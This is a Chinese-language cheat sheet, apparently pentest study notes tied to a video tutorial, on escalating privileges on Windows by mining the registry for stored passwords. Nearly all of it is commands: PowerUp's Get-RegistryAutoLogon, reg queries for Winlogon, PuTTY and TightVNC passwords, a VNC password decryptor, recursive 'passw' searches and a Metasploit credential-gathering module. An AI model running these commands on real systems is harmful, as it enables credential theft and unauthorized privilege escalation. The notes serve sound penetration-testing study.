注册表密码挖掘的提权

注册表密码挖掘的提权

视频教程:https://www.acfun.cn/v/ac13017016

自动登陆密码

1
2
3
4
5
6
7
8
9
powershell -nop -ep bypass
Import-Module C:\Users\user\Desktop\PowerUp.ps1
Get-RegistryAutoLogon         
#查找注册表中自动登陆的密码
---
1.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUsername
2.
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword

软件密码

1
2
3
4
5
6
7
8
9
10
3.
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyUsername
4.
reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\BWP123F42 -v ProxyPassword
5.
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v Password
6.
reg query HKEY_CURRENT_USER\Software\TightVNC\Server /v PasswordViewOnly
C:\Users\User\Desktop\Tools\vncpwd\vncpwd.exe 加密后的密码
cmd面板 右键mark

编写注册表脚本自动登陆

1
2
3
4
5
6
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1" 
"DefaultUserName"="自动登陆的用户名"
"DefaultDomainName"="0"
"DefaultPassword"="自动登陆的用户密码"

修改自动登陆的用户密码会发生什么?

搜索注册表所有密码

1
2
reg query HKLM /f passw /t REG_SZ /s
reg.exe query HKCU /f passw /t REG_SZ /s

msfconsole

search post/windows/gather/credentials/windows_autologin